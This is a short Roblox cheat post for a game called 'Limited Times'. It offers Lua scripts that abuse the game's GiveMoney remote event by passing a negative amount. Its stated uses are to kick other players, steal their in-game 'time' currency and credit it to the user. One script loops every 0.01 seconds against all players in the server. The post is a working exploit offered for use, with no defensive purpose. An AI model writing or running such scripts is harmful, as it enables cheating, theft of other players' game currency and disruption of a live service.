MADE BY Metestedlal
FEATURE:
- KICK PEOPLE
- TAKE OTHER TIMES
- GIVES MONEY
- .
- HOW TO USE:
if you change ENTERNUMBERHERE to anything above their time, they get kicked.
also if you take some time, it adds it to yours so if you do -500,000 for example on someone with 1,400 time, they’ll get kicked and youll get 500,000 time
USERNAMEHERE has to be caps sensitive and make sure ENTERNUMBERHERE is negative, if its positive it gives them time from your wallet
GAME LINK:
LIMITED TIMES (LIMITED WORDS)
SCRIPTS: [2]
local args = {
[1] = game:GetService("Players").USERNAMEHERE,
[2] = ENTERNUMBERHERE
}
game:GetService("ReplicatedStorage").GiveMoney:FireServer(unpack(args))
STEAL OTHER PEOPLE TIME
while true do
wait(0.01)
local args = {
[1] = game:GetService("Players"):GetPlayers(),
[2] = -1000
}
game:GetService("ReplicatedStorage").GiveMoney:FireServer(unpack(args))
end
FREE MONEY WITHOUT STEALING